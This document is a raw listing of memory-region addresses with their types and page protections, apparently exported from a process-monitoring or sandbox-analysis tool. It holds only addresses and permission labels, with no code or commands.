heap
page read and write
6A4FF000
unkown
page read and write
513000
heap
page read and write
4711000
heap
page read and write
7D0CCFE000
stack
page read and write
694D1000
unkown
page read and write
8C58000
heap
page read and write
4711000
heap
page read and write
2C14000
heap
page read and write
8CA8000
heap
page read and write
7E39000
heap
page read and write
25A22971000
trusted library allocation
page read and write
4711000
heap
page read and write
4630000
heap
page read and write
103A000
stack
page read and write
25A208B0000
heap
page read and write
6B1C8000
unkown
page read and write
77FE000
stack
page read and write
778E000
stack
page read and write
5060000
heap
page read and write
170000
unkown
page readonly
1156000
heap
page read and write
7F7E000
stack
page read and write
4711000
heap
page read and write
542E000
stack
page read and write
4711000
heap
page read and write
6B066000
unkown
page write copy
9080000
trusted library allocation
page read and write
549D000
trusted library allocation
page read and write
6B15B000
unkown
page write copy
6B371000
unkown
page read and write
7D8D000
heap
page read and write
7670000
heap
page read and write
49EE000
heap
page read and write
5484000
unclassified section
page read and write
2330000
heap
page read and write
32D0000
unkown
page read and write
692C7000
unkown
page read and write
258D000
unkown
page read and write
79D0000
heap
page readonly
551E000
stack
page read and write
7731000
heap
page read and write
4711000
heap
page read and write
2DE2000
heap
page read and write
8F8C000
stack
page read and write
22770000
direct allocation
page read and write
4711000
heap
page read and write
600000
unkown
page readonly
7FFB202D0000
trusted library allocation
page read and write
2310000
heap
page read and write
327E000
stack
page read and write
4711000
heap
page read and write
8080000
trusted library allocation
page read and write
7FFB201C0000
trusted library allocation
page read and write
26BF0000
direct allocation
page read and write
438000
heap
page read and write
1F402C00000
heap
page read and write
7C7E000
stack
page read and write
17C747EB000
heap
page read and write
33B0000
trusted library allocation
page read and write
4CAF000
stack
page read and write
1AE000
stack
page read and write
6B2B6000
unkown
page read and write
7FBE000
stack
page read and write
695F3000
unkown
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
420000
heap
page read and write
7732000
heap
page read and write
25F2000
unkown
page read and write
7FFB1FF64000
trusted library allocation
page read and write
25D7000
unkown
page read and write
78B3000
heap
page read and write
32AF000
stack
page read and write
8060000
trusted library allocation
page read and write
7D3E000
stack
page read and write
6B035000
unkown
page read and write
2628000
unkown
page read and write
3010000
heap
page read and write
25A223F0000
trusted library allocation
page read and write
7D0E0CD000
stack
page read and write
7FFB202A0000
trusted library allocation
page read and write
1CA88F19000
trusted library allocation
page read and write
25BA000
unkown
page read and write
8C8A000
heap
page read and write
4711000
heap
page read and write
2613000
unkown
page read and write
22F60000
heap
page read and write
13F7000
system
page execute and read and write
2DC0000
heap
page read and write
4E0E000
stack
page read and write
501000
heap
page read and write
6B264000
unkown
page write copy
692D5000
unkown
page execute read
6B3E0000
unkown
page write copy
6B33A000
unkown
page read and write
2C5F000
stack
page read and write
C3A5000
direct allocation
page execute and read and write
25A23127000
trusted library allocation
page read and write
2DCD000
stack
page read and write
4711000
heap
page read and write
4B8000
heap
page read and write
13CF000
system
page execute and read and write
6AE66000
unkown
page write copy
323E000
stack
page read and write
4711000
heap
page read and write
272F000
stack
page read and write
1178000
heap
page read and write
6B19C000
unkown
page write copy
4711000
heap
page read and write
773B000
heap
page read and write
4E0000
heap
page read and write
7FFB20130000
trusted library allocation
page execute and read and write
1F402D79000
heap
page read and write
34A0000
heap
page read and write
22F68000
heap
page read and write
6A045000
unkown
page read and write
1CA87356000
heap
page read and write
4711000
heap
page read and write
4DF0000
heap
page read and write
4711000
heap
page read and write
25A32980000
trusted library allocation
page read and write
6B388000
unkown
page write copy
2F20000
unkown
page read and write
82FC000
stack
page read and write
6B358000
unkown
page read and write
25A3AAD7000
heap
page read and write
185000
unkown
page read and write
4711000
heap
page read and write
6B4BD000
unkown
page read and write
26C20000
direct allocation
page read and write
4E4E000
stack
page read and write
6A104000
unkown
page write copy
3380000
trusted library allocation
page read and write
3040000
direct allocation
page read and write
2DE8000
heap
page read and write
7A20000
heap
page read and write
25D7000
unkown
page read and write
2340000
unkown
page read and write
25A244C1000
trusted library allocation
page read and write
25A20A2C000
heap
page read and write
5087FE000
stack
page read and write
2DC7000
heap
page read and write
2D5E000
stack
page read and write
69486000
unkown
page readonly
4711000
heap
page read and write
310D000
stack
page read and write
25A3A97E000
heap
page read and write
6DC0000
unkown
page execute and read and write
7731000
heap
page read and write
578C000
stack
page read and write
70E000
stack
page read and write
2B20000
heap
page read and write
6B111000
unkown
page write copy
766E000
stack
page read and write
69491000
unkown
page read and write
25A32971000
trusted library allocation
page read and write
2575000
unkown
page read and write
4711000
heap
page read and write
7B1E000
stack
page read and write
6B034000
unkown
page write copy
1CA87610000
heap
page read and write
17C748E0000
heap
page read and write
3260000
unkown
page read and write
6B409000
unkown
page write copy
25A3AE5D000
heap
page read and write
32E3000
unkown
page read and write
6B368000
unkown
page read and write
4710000
heap
page read and write
15AE000
stack
page read and write
25A20A63000
heap
page read and write
255A000
unkown
page read and write
72C0000
heap
page execute and read and write
6B43C000
unkown
page write copy
4711000
heap
page read and write
843F000
stack
page read and write
75E7000
heap
page read and write
25A3AE6F000
heap
page read and write
3399000
trusted library allocation
page read and write
25A20760000
heap
page read and write
4711000
heap
page read and write
25A2444A000
trusted library allocation
page read and write
6B3F0000
unkown
page write copy
27D0000
heap
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
47A000
heap
page read and write
338B000
heap
page read and write
7FFB202C0000
trusted library allocation
page read and write
170000
unkown
page readonly
A5A5000
direct allocation
page execute and read and write
2594000
unkown
page read and write
4CB8000
trusted library allocation
page read and write
2F00000
unkown
page readonly
6B1A3000
unkown
page read and write
6B34F000
unkown
page write copy
69290000
unkown
page readonly
25D3000
unkown
page read and write
4711000
heap
page read and write
8B40000
trusted library allocation
page read and write
7E34000
heap
page read and write
7FFB1FF7B000
trusted library allocation
page read and write
852E000
heap
page read and write
3150000
heap
page read and write
7FFB858E0000
unkown
page readonly
2619000
unkown
page read and write
2D1D000
stack
page read and write
4711000
heap
page read and write
32E0000
unkown
page read and write
DA0000
unkown
page readonly
6B460000
unkown
page write copy
80E000
stack
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
6007000
trusted library allocation
page read and write
69460000
unkown
page readonly
4711000
heap
page read and write
4711000
heap
page read and write
258A000
unkown
page read and write
17C74650000
heap
page read and write
7BE000
unkown
page read and write
253D000
stack
page read and write
4711000
heap
page read and write
A10000
unkown
page readonly
69464000
unkown
page read and write
6B360000
unkown
page read and write
1CA890AE000
trusted library allocation
page read and write
7742000
heap
page read and write
6B2BC000
unkown
page read and write
24010000
unclassified section
page execute and read and write
6AE67000
unkown
page read and write
25A22FBE000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
7ADE000
stack
page read and write
10000
heap
page read and write
7A60000
heap
page execute and read and write
6AE60000
unkown
page readonly
7714000
heap
page read and write
69291000
unkown
page read and write
8C10000
trusted library allocation
page read and write
754C000
stack
page read and write
8AA0000
trusted library allocation
page execute and read and write
4711000
heap
page read and write
69465000
unkown
page execute read
6B351000
unkown
page read and write
549B000
trusted library allocation
page read and write
694DC000
unkown
page read and write
6B459000
unkown
page read and write
2C10000
heap
page read and write
7D0E04E000
stack
page read and write
7723000
heap
page read and write
22B70000
heap
page read and write
9060000
trusted library allocation
page read and write
748E000
stack
page read and write
292F000
stack
page read and write
4F50000
heap
page read and write
DA1000
unkown
page readonly
3175000
remote allocation
page execute and read and write
49F2000
heap
page read and write
2D09000
stack
page read and write
7FFB20240000
trusted library allocation
page read and write
25A3AB80000
heap
page read and write
2C60000
heap
page read and write
4C60000
heap
page read and write
1170000
heap
page read and write
7A20000
heap
page read and write
227A0000
direct allocation
page read and write
70E000
stack
page read and write
4B8000
heap
page read and write
7D0C7AE000
stack
page read and write
71E2000
system
page read and write
25A22370000
trusted library allocation
page read and write
4711000
heap
page read and write
7EFE000
stack
page read and write
7D0CA7E000
stack
page read and write
2619000
unkown
page read and write
6B2DB000
unkown
page write copy
4711000
heap
page read and write
47A000
heap
page read and write
6B2B7000
unkown
page write copy
6EC6BFF000
stack
page read and write
6B42E000
unkown
page read and write
4711000
heap
page read and write
7D79000
heap
page read and write
4711000
heap
page read and write
25A3ADAF000
heap
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
7E68000
heap
page read and write
76F0000
heap
page read and write
2601000
unkown
page read and write
25A3ADF2000
heap
page read and write
4711000
heap
page read and write
755000
heap
page read and write
4711000
heap
page read and write
76C0000
heap
page read and write
3AC3000
unkown
page read and write
5E71000
trusted library allocation
page read and write
6B262000
unkown
page write copy
4711000
heap
page read and write
3080000
remote allocation
page execute and read and write
6EC6B7E000
stack
page read and write
6B35B000
unkown
page write copy
36CF000
stack
page read and write
25C6000
unkown
page read and write
6B3EB000
unkown
page write copy
22CDF000
stack
page read and write
7FFB20142000
trusted library allocation
page read and write
6B15F000
unkown
page read and write
4460000
heap
page read and write
692B6000
unkown
page read and write
4711000
heap
page read and write
17C747E0000
heap
page read and write
69297000
unkown
page write copy
25E3000
unkown
page read and write
6AD30000
unkown
page readonly
6B26A000
unkown
page write copy
7DEC000
heap
page read and write
25A24062000
trusted library allocation
page read and write
7FFB201D0000
trusted library allocation
page read and write
23060000
direct allocation
page read and write
25A3AD9B000
heap
page read and write
46E000
unkown
page read and write
25A24548000
trusted library allocation
page read and write
873F000
stack
page read and write
438000
heap
page read and write
4F0000
heap
page read and write
4B9D000
direct allocation
page execute and read and write
3222000
unkown
page read and write
4711000
heap
page read and write
9070000
trusted library allocation
page read and write
2290000
unkown
page read and write
596F000
stack
page read and write
4A3F000
stack
page read and write
1740000
unkown
page readonly
1CA88F08000
trusted library allocation
page read and write
6ACE7000
unkown
page execute read
4711000
heap
page read and write
7FFB201B0000
trusted library allocation
page read and write
78C0000
heap
page read and write
6AD52000
unkown
page execute read
4E2000
heap
page read and write
1F402D79000
heap
page read and write
A00000
heap
page read and write
1480000
unkown
page read and write
4711000
heap
page read and write
6B268000
unkown
page read and write
4BF0000
trusted library allocation
page read and write
6A10D000
unkown
page execute read
6CC31FF000
stack
page read and write
4711000
heap
page read and write
79F0000
direct allocation
page read and write
13A000
stack
page read and write
4711000
heap
page read and write
47F000
heap
page read and write
695B5000
unkown
page read and write
7DEB000
heap
page read and write
7FFB20200000
trusted library allocation
page read and write
3FE000
stack
page read and write
6B2AA000
unkown
page write copy
1CA87120000
heap
page read and write
3328000
heap
page read and write
4711000
heap
page read and write
7DE1000
heap
page read and write
694F1000
unkown
page write copy
7E70000
trusted library allocation
page read and write
40000
heap
page read and write
6B3DB000
unkown
page read and write
1CA88F00000
trusted library allocation
page read and write
2563000
unkown
page read and write
4E71000
trusted library allocation
page read and write
316A000
heap
page read and write
6B45B000
unkown
page read and write
8C00000
trusted library allocation
page execute and read and write
695B7000
unkown
page write copy
326E000
stack
page read and write
6B3F1000
unkown
page read and write
4711000
heap
page read and write
25A223C0000
trusted library allocation
page read and write
4EDC000
unclassified section
page read and write
6B2DA000
unkown
page read and write
25E10000
unclassified section
page execute and read and write
6A4C1000
unkown
page read and write
25A22280000
heap
page read and write
6B449000
unkown
page write copy
2591000
unkown
page read and write
25A3AB12000
heap
page read and write
4711000
heap
page read and write
25A22F21000
trusted library allocation
page read and write
7DF44A2D0000
trusted library allocation
page execute and read and write
2C14000
heap
page read and write
25A20A80000
heap
page read and write
7FFB20180000
trusted library allocation
page read and write
25A230C1000
trusted library allocation
page read and write
25A3AE55000
heap
page read and write
78D0000
heap
page read and write
7D84000
heap
page read and write
2E9A000
heap
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
25F7000
unkown
page read and write
254E000
unkown
page read and write
7CFE000
stack
page read and write
2260000
unkown
page readonly
1F402AE0000
heap
page read and write
774E000
stack
page read and write
9D0000
unkown
page read and write
1AE1000
unkown
page readonly
90B0000
direct allocation
page execute and read and write
3670000
unclassified section
page readonly
2BFE000
stack
page read and write
461E000
stack
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
69490000
unkown
page readonly
70E000
stack
page read and write
9090000
trusted library allocation
page execute and read and write
4DCE000
stack
page read and write
7FFB201E0000
trusted library allocation
page read and write
1CA871F3000
system
page execute and read and write
25A23467000
trusted library allocation
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
7FFB201F0000
trusted library allocation
page read and write
7D0E2CB000
stack
page read and write
7E5E000
heap
page read and write
77E4000
system
page read and write
4711000
heap
page read and write
1CA87367000
heap
page read and write
2313000
heap
page read and write
2571000
unkown
page read and write
1941000
unkown
page readonly
4711000
heap
page read and write
6A101000
unkown
page read and write
6AD31000
unkown
page read and write
7FFB20120000
trusted library allocation
page execute and read and write
6B339000
unkown
page write copy
D4C0000
direct allocation
page read and write
4711000
heap
page read and write
7D0C72E000
stack
page read and write
7E7E000
stack
page read and write
4711000
heap
page read and write
8CCE000
heap
page read and write
420000
unkown
page read and write
7FFB85900000
unkown
page read and write
49E0000
trusted library allocation
page read and write
7FFB20290000
trusted library allocation
page read and write
4D10000
trusted library allocation
page read and write
411000
unkown
page readonly
25BD000
unkown
page read and write
25A20A46000
heap
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
26C60000
direct allocation
page read and write
694CB000
unkown
page write copy
25CE000
unkown
page read and write
7FFB20170000
trusted library allocation
page read and write
810000
unclassified section
page readonly
4711000
heap
page read and write
48F000
heap
page read and write
3228000
heap
page read and write
4711000
heap
page read and write
7DFE000
stack
page read and write
8030000
trusted library allocation
page read and write
69462000
unkown
page write copy
3040000
direct allocation
page read and write
3120000
trusted library section
page read and write
4711000
heap
page read and write
990000
heap
page read and write
22F61000
heap
page read and write
8070000
trusted library allocation
page read and write
2C14000
heap
page read and write
5088FF000
stack
page read and write
6A4C3000
unkown
page write copy
DB0000
heap
page read and write
25A22960000
heap
page read and write
4711000
heap
page read and write
2C14000
heap
page read and write
694F7000
unkown
page write copy
574B000
stack
page read and write
3060000
trusted library allocation
page read and write
4711000
heap
page read and write
7D0D17B000
stack
page read and write
6B38D000
unkown
page write copy
7B5E000
stack
page read and write
23116000
heap
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
4CA0000
unclassified section
page readonly
26C80000
direct allocation
page read and write
900000
unkown
page read and write
21B0000
unkown
page read and write
6AE4D000
unkown
page readonly
7FFB20220000
trusted library allocation
page read and write
84AE000
stack
page read and write
26970000
unclassified section
page execute and read and write
6B2BD000
unkown
page write copy
233E9000
direct allocation
page execute and read and write
25A3AE91000
heap
page read and write
6AC89000
unkown
page readonly
773C000
heap
page read and write
8C9C000
heap
page read and write
2DDD000
heap
page read and write
6B408000
unkown
page read and write
4711000
heap
page read and write
4700000
heap
page read and write
2594000
unkown
page read and write
1CA87280000
heap
page read and write
4D3C000
direct allocation
page execute and read and write
6B367000
unkown
page write copy
4711000
heap
page read and write
8BF000
stack
page read and write
338D000
trusted library allocation
page execute and read and write
4711000
heap
page read and write
71D8000
system
page read and write
43FC000
stack
page read and write
4711000
heap
page read and write
25FC000
unkown
page read and write
7E2E000
heap
page read and write
4711000
heap
page read and write
7E3F000
heap
page read and write
694A1000
unkown
page read and write
7FC0000
heap
page read and write
4711000
heap
page read and write
69461000
unkown
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
80E000
stack
page read and write
4C40000
heap
page readonly
22760000
direct allocation
page read and write
7D0DFCE000
stack
page read and write
8C6A000
heap
page read and write
7931000
heap
page read and write
25BA000
unkown
page read and write
7D0D0FE000
stack
page read and write
3173000
unkown
page read and write
692D4000
unkown
page read and write
6B2A8000
unkown
page write copy
3AC0000
unkown
page read and write
6B356000
unkown
page write copy
6ACE2000
unkown
page write copy
6ACE3000
unkown
page read and write
1CA890A4000
trusted library allocation
page read and write
6B2F8000
unkown
page write copy
6949A000
unkown
page read and write
6B0C7000
unkown
page write copy
45C0000
unkown
page execute and read and write
4711000
heap
page read and write
4B80000
heap
page read and write
475000
heap
page read and write
6AE7F000
unkown
page read and write
6B067000
unkown
page read and write
171000
unkown
page execute read
4711000
heap
page read and write
4711000
heap
page read and write
32D4000
unkown
page read and write
A05000
heap
page read and write
149000
stack
page read and write
7FFB20210000
trusted library allocation
page read and write
31A3000
heap
page read and write
45DE000
stack
page read and write
3110000
trusted library section
page read and write
25A20945000
heap
page read and write
7C3E000
stack
page read and write
2617000
unkown
page read and write
25A20940000
heap
page read and write
7FFB1FF63000
trusted library allocation
page execute and read and write
692BA000
unkown
page read and write
1F402D70000
heap
page read and write
4CE000
heap
page read and write
8AFE000
stack
page read and write
1F4028C0000
heap
page read and write
3260000
unkown
page read and write
6B260000
unkown
page read and write
4D8E000
stack
page read and write
25F2000
unkown
page read and write
4711000
heap
page read and write
570F000
stack
page read and write
6B43A000
unkown
page write copy
7DEC000
heap
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
26C40000
direct allocation
page read and write
3AC0000
unkown
page read and write
17C76220000
heap
page read and write
4711000
heap
page read and write
2AB0000
heap
page read and write
6B029000
unkown
page read and write
4711000
heap
page read and write
345E000
stack
page read and write
25A3AAC3000
heap
page read and write
4F75000
remote allocation
page execute and read and write
694E2000
unkown
page write copy
980000
unkown
page readonly
3370000
trusted library allocation
page read and write
4CE000
heap
page read and write
6CC29FE000
stack
page read and write
254E000
unkown
page read and write
6B456000
unkown
page read and write
980000
unkown
page readonly
6B013000
unkown
page write copy
73FC000
system
page read and write
6B4C3000
unkown
page write copy
7E80000
trusted library allocation
page read and write
4711000
heap
page read and write
15C0000
unkown
page read and write
47F000
heap
page read and write
25A223A0000
trusted library allocation
page read and write
56CE000
stack
page read and write
4A70000
direct allocation
page execute and read and write
4711000
heap
page read and write
7728000
heap
page read and write
49E0000
trusted library allocation
page read and write
6B26B000
unkown
page read and write
2571000
unkown
page read and write
13A000
stack
page read and write
3154000
heap
page read and write
502000
heap
page read and write
25E8000
unkown
page read and write
258D000
unkown
page read and write
2585000
unkown
page read and write
2628000
unkown
page read and write
33B2000
trusted library allocation
page read and write
8C0000
heap
page read and write
22D1E000
stack
page read and write
1CA88F0C000
trusted library allocation
page read and write
25A23FB0000
trusted library allocation
page read and write
4DD3000
unclassified section
page read and write
8BBD000
stack
page read and write
A10000
unkown
page readonly
25A22B9E000
trusted library allocation
page read and write
8500000
heap
page read and write
6A4DB000
unkown
page read and write
AD000
stack
page read and write
25A3AE3D000
heap
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
833C000
stack
page read and write
526000
heap
page read and write
3130000
heap
page read and write
851A000
heap
page read and write
25A3AB2A000
heap
page read and write
2EA7000
heap
page read and write
4711000
heap
page read and write
227E0000
unclassified section
page readonly
4711000
heap
page read and write
332E000
stack
page read and write
6B1C9000
unkown
page write copy
7FFB20080000
trusted library allocation
page execute and read and write
187000
unkown
page readonly
7FFB85905000
unkown
page readonly
8A97000
stack
page read and write
6B19B000
unkown
page read and write
33D9000
heap
page read and write
8510000
heap
page read and write
7FFB858F6000
unkown
page readonly
25AA000
unkown
page read and write
10000
heap
page read and write
349F000
stack
page read and write
4711000
heap
page read and write
313A000
heap
page read and write
6B458000
unkown
page write copy
22E8F000
stack
page read and write
25F7000
unkown
page read and write
258A000
unkown
page read and write
2240000
unkown
page read and write
4711000
heap
page read and write
22D5B000
stack
page read and write
8090000
trusted library allocation
page read and write
9B0000
unkown
page read and write
2DDD000
heap
page read and write
7732000
heap
page read and write
750E000
stack
page read and write
25A3AA80000
heap
page read and write
8F0C000
stack
page read and write
4711000
heap
page read and write
6B4C4000
unkown
page read and write
694F9000
unkown
page write copy
8514000
heap
page read and write
260C000
unkown
page read and write
4D40000
direct allocation
page execute and read and write
23590000
direct allocation
page execute and read and write
8F4C000
stack
page read and write
6B174000
unkown
page read and write
2C14000
heap
page read and write
22C0000
heap
page read and write
17E000
unkown
page readonly
7DA1000
heap
page read and write
26C90000
direct allocation
page read and write
25A20A36000
heap
page read and write
25D3000
unkown
page read and write
6A506000
unkown
page write copy
2A2F000
stack
page read and write
17C747C5000
heap
page read and write
2308B000
heap
page read and write
2240000
unkown
page read and write
3154000
heap
page read and write
25A24460000
trusted library allocation
page read and write
6B161000
unkown
page write copy
1F402D79000
heap
page read and write
1CA874B0000
trusted library allocation
page read and write
77CE000
stack
page read and write
6B155000
unkown
page write copy
8CA0000
heap
page read and write
6B49B000
unkown
page write copy
4711000
heap
page read and write
726E000
stack
page read and write
315D000
heap
page read and write
34CE000
stack
page read and write
6EC6AFE000
stack
page read and write
25D9000
unkown
page read and write
7728000
heap
page read and write
31E5000
heap
page read and write
25A3AE37000
heap
page read and write
7731000
heap
page read and write
4D0C000
stack
page read and write
25AA000
unkown
page read and write
4711000
heap
page read and write
6ACE4000
unkown
page write copy
6B15E000
unkown
page write copy
4711000
heap
page read and write
25A233DF000
trusted library allocation
page read and write
6B10D000
unkown
page write copy
6B1D2000
unkown
page write copy
1941000
unkown
page readonly
11A0000
heap
page read and write
4711000
heap
page read and write
8050000
trusted library allocation
page read and write
526000
heap
page read and write
3070000
unkown
page read and write
2610000
unkown
page read and write
77F0000
heap
page read and write
4FC000
heap
page read and write
80B0000
trusted library allocation
page read and write
7D0CB7E000
stack
page read and write
5975000
remote allocation
page execute and read and write
4A5E000
stack
page read and write
306E000
stack
page read and write
53EB000
stack
page read and write
6B02F000
unkown
page write copy
3000000
direct allocation
page read and write
25B0000
unkown
page read and write
25A23171000
trusted library allocation
page read and write
6A040000
unkown
page readonly
4711000
heap
page read and write
6B44C000
unkown
page write copy
75E6000
heap
page read and write
13EA000
system
page execute and read and write
1CA874B0000
trusted library allocation
page read and write
25CB000
unkown
page read and write
8B70000
heap
page read and write
282F000
stack
page read and write
D4B0000
direct allocation
page read and write
3AC6000
unkown
page read and write
227C0000
direct allocation
page read and write
593A000
unclassified section
page read and write
7BB0000
trusted library allocation
page execute and read and write
6B162000
unkown
page read and write
1CA874B0000
trusted library allocation
page read and write
6B1A4000
unkown
page write copy
6B2F7000
unkown
page read and write
6AF7F000
unkown
page readonly
990000
heap
page read and write
257B000
unkown
page read and write
7F3C000
stack
page read and write
7755000
heap
page read and write
4711000
heap
page read and write
25A3AABD000
heap
page read and write
4711000
heap
page read and write
78F0000
trusted library allocation
page read and write
3824000
unkown
page read and write
1F402A00000
heap
page read and write
84EF000
stack
page read and write
4CE000
heap
page read and write
4711000
heap
page read and write
1470000
unkown
page read and write
171000
unkown
page execute read
25A23132000
trusted library allocation
page read and write
6A100000
unkown
page readonly
4FC0000
unkown
page execute and read and write
F7C000
unkown
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
25A3AD70000
heap
page execute and read and write
A00000
heap
page read and write
526000
heap
page read and write
6B45D000
unkown
page read and write
3366000
heap
page read and write
1CA87330000
heap
page read and write
7DEC000
heap
page read and write
DA1000
unkown
page readonly
259D000
unkown
page read and write
26C70000
direct allocation
page read and write
37E000
stack
page read and write
6A056000
unkown
page execute read
69294000
unkown
page read and write
694F8000
unkown
page read and write
692B9000
unkown
page write copy
695F4000
unkown
page execute read
4711000
heap
page read and write
69F7B000
unkown
page readonly
6B44E000
unkown
page read and write
4D40000
heap
page read and write
4AE000
stack
page read and write
2566000
unkown
page read and write
1F402D75000
heap
page read and write
32E0000
unkown
page read and write
6B2BB000
unkown
page write copy
24A10000
unclassified section
page execute and read and write
411000
unkown
page readonly
7FFB20280000
trusted library allocation
page read and write
1AE1000
unkown
page readonly
1740000
unkown
page readonly
257F000
unkown
page read and write
256A000
unkown
page read and write
692C9000
unkown
page write copy
A05000
heap
page read and write
443A000
stack
page read and write
4711000
heap
page read and write
7DEC000
heap
page read and write
4B99000
direct allocation
page execute and read and write
4711000
heap
page read and write
25A3AE64000
heap
page read and write
475000
heap
page read and write
25A20950000
heap
page read and write
7D82000
heap
page read and write
2B3E000
heap
page read and write
25A244D5000
trusted library allocation
page read and write
6AD25000
unkown
page readonly
25E3000
unkown
page read and write
8E0000
heap
page read and write
4711000
heap
page read and write
113C000
stack
page read and write
49E0000
trusted library allocation
page read and write
2C9E000
stack
page read and write
6A041000
unkown
page read and write
3383000
trusted library allocation
page execute and read and write
7D0C7EE000
stack
page read and write
4711000
heap
page read and write
2B2F000
stack
page read and write
694E3000
unkown
page read and write
7827000
heap
page read and write
6375000
remote allocation
page execute and read and write
4E6000
heap
page read and write
7721000
heap
page read and write
75E0000
heap
page read and write
6B3D5000
unkown
page write copy
4711000
heap
page read and write
22E0F000
stack
page read and write
694BB000
unkown
page write copy
2556000
unkown
page read and write
173E000
stack
page read and write
4711000
heap
page read and write
103A000
stack
page read and write
47A000
heap
page read and write
2318000
heap
page read and write
72C5000
heap
page execute and read and write
9C0000
unkown
page read and write
6A500000
unkown
page write copy
32D4000
unkown
page read and write
69561000
unkown
page read and write
259A000
unkown
page read and write
4711000
heap
page read and write
2A2F000
stack
page read and write
33B5000
trusted library allocation
page execute and read and write
400000
unkown
page readonly
4711000
heap
page read and write
3218000
unkown
page read and write
25A22470000
heap
page read and write
7FFB20160000
trusted library allocation
page read and write
7FFB1FF60000
trusted library allocation
page read and write
4711000
heap
page read and write
2ED9000
stack
page read and write
22C0000
heap
page read and write
7FFB202B0000
trusted library allocation
page read and write
7DEC000
heap
page read and write
6B010000
unkown
page readonly
555F000
stack
page read and write
4711000
heap
page read and write
6B373000
unkown
page write copy
25A228B0000
heap
page execute and read and write
7FFB20150000
trusted library allocation
page execute and read and write
4711000
heap
page read and write
4B8000
heap
page read and write
25A22450000
heap
page read and write
49FE000
stack
page read and write
3BC0000
unkown
page execute and read and write
25A23178000
trusted library allocation
page read and write
820000
unkown
page read and write
25A22DE5000
trusted library allocation
page read and write
3300000
heap
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
59C0000
unkown
page execute and read and write
257B000
unkown
page read and write
1CA87190000
system
page execute and read and write
694BA000
unkown
page read and write
1CA87364000
heap
page read and write
2290000
unkown
page read and write
75DF000
stack
page read and write
187000
unkown
page readonly
2B6F000
heap
page read and write
25CE000
unkown
page read and write
694D2000
unkown
page write copy
6B4C8000
unkown
page read and write
6EC6A7C000
stack
page read and write
6D75000
remote allocation
page execute and read and write
79F000
stack
page read and write
26BE0000
direct allocation
page read and write
694E0000
unkown
page write copy
2D0D000
stack
page read and write
259D000
unkown
page read and write
6B4F7000
unkown
page execute read
25A23086000
trusted library allocation
page read and write
22C5F000
stack
page read and write
25A223B0000
heap
page readonly
5EAF000
stack
page read and write
6B454000
unkown
page write copy
3377000
heap
page read and write
25A22474000
heap
page read and write
25A22F2B000
trusted library allocation
page read and write
7741000
heap
page read and write
4711000
heap
page read and write
80A0000
trusted library allocation
page read and write
26C30000
direct allocation
page read and write
7122000
system
page read and write
6B42F000
unkown
page write copy
79E0000
direct allocation
page read and write
15C0000
unkown
page read and write
4711000
heap
page read and write
144C000
system
page execute and read and write
7D0CDFE000
stack
page read and write
6B4BF000
unkown
page read and write
7DF6000
heap
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
6B438000
unkown
page read and write
2C14000
heap
page read and write
7FFB20230000
trusted library allocation
page read and write
17C747C0000
heap
page read and write
1CA88F02000
trusted library allocation
page read and write
25A23541000
trusted library allocation
page read and write
7D0CBFD000
stack
page read and write
22790000
direct allocation
page read and write
8040000
trusted library allocation
page read and write
6B183000
unkown
page write copy
4711000
heap
page read and write
7FFB201A0000
trusted library allocation
page read and write
25A3AEB7000
heap
page read and write
4711000
heap
page read and write
4E6000
heap
page read and write
4711000
heap
page read and write
4E78000
unclassified section
page read and write
26810000
unclassified section
page execute and read and write
400000
unkown
page readonly
2D80000
heap
page read and write
6B0A8000
unkown
page write copy
1CA87360000
heap
page read and write
2CCC000
stack
page read and write
762D000
stack
page read and write
7860000
heap
page read and write
2DE8000
heap
page read and write
13DA000
system
page execute and read and write
25A3AE7F000
heap
page read and write
22C1E000
stack
page read and write
78EC000
heap
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
694F3000
unkown
page read and write
1160000
unkown
page readonly
6BEF7000
unkown
page execute read
2330000
heap
page read and write
8AB0000
trusted library allocation
page read and write
6B440000
unkown
page write copy
23243000
heap
page read and write
2575000
unkown
page read and write
7D0CAFD000
stack
page read and write
1CA890B4000
trusted library allocation
page read and write
4711000
heap
page read and write
4FC000
heap
page read and write
6941F000
unkown
page execute read
4711000
heap
page read and write
4E6000
heap
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
69440000
unkown
page readonly
16FC000
unkown
page read and write
4711000
heap
page read and write
6ACE0000
unkown
page readonly
71EE000
stack
page read and write
262E000
unkown
page read and write
7A00000
direct allocation
page read and write
6B15C000
unkown
page read and write
25BD000
unkown
page read and write
4FC000
heap
page read and write
7DEC000
heap
page read and write
2DE2000
heap
page read and write
3070000
unkown
page read and write
22F1C000
stack
page read and write
336E000
stack
page read and write
4711000
heap
page read and write
3170000
unkown
page readonly
4711000
heap
page read and write
4BBF000
stack
page read and write
4711000
heap
page read and write
2A3B000
stack
page read and write
6B448000
unkown
page read and write
2F50000
unkown
page read and write
6B1D1000
unkown
page read and write
7705000
heap
page read and write
2310000
heap
page read and write
4711000
heap
page read and write
25A20A43000
heap
page read and write
2556000
unkown
page read and write
6AD51000
unkown
page read and write
7728000
heap
page read and write
7838000
heap
page read and write
4FC000
heap
page read and write
4711000
heap
page read and write
6B453000
unkown
page read and write
83BC000
stack
page read and write
5083AD000
stack
page read and write
2566000
unkown
page read and write
6B30D000
unkown
page read and write
6B342000
unkown
page write copy
25A3ADAC000
heap
page read and write
7560000
heap
page read and write
7FFB20046000
trusted library allocation
page execute and read and write
6A4DC000
unkown
page write copy
25A229FA000
trusted library allocation
page read and write
2280000
unkown
page read and write
600000
unkown
page readonly
25A20A65000
heap
page read and write
25B0000
unkown
page read and write
6B43B000
unkown
page read and write
7F6E000
stack
page read and write
6B154000
unkown
page read and write
25A3AB2C000
heap
page read and write
4711000
heap
page read and write
2DE2000
heap
page read and write
336C000
heap
page read and write
